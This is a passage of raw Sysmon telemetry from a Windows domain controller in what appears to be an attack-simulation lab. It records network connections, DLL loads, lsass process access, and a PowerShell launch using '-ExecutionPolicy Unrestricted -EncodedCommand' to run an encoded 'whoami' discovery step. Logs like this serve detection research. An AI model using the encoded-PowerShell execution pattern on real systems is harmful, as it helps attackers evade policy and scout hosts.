AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local49719-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:25.575{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local49719-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.557{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49718-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.557{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49718-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 734700x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:42.581{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.112{266CAFBE-647D-6064-3500-00000000AE01}2820C:\Windows\System32\ismserv.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 
734700x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.268{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.705{266CAFBE-647D-6064-3600-00000000AE01}2704C:\Windows\System32\dfssvc.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.736{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.564{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft 
Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.564{266CAFBE-6495-6064-8100-00000000AE01}4272win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.735{266CAFBE-646C-6064-1000-00000000AE01}1124win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.731{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 10341000x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.971{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.971{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.955{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.908{266CAFBE-6497-6064-8900-00000000AE01}4832ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.877{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.877{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.861{266CAFBE-6497-6064-8900-00000000AE01}48322188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+62790069(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c134f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c1312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+626db42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61bd009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c33b1
1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c15b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c15b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c159b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c066d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c13c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c137e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c134f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61c1312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+626db42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61bf83d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+61bf794a(wow64) 154100x80000000000000003517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.873{266CAFBE-6497-6064-8A00-00000000AE01}1564C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating 
SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000003516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.830{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:27.814{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-6497-6064-8900-00000000AE01}4832C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\W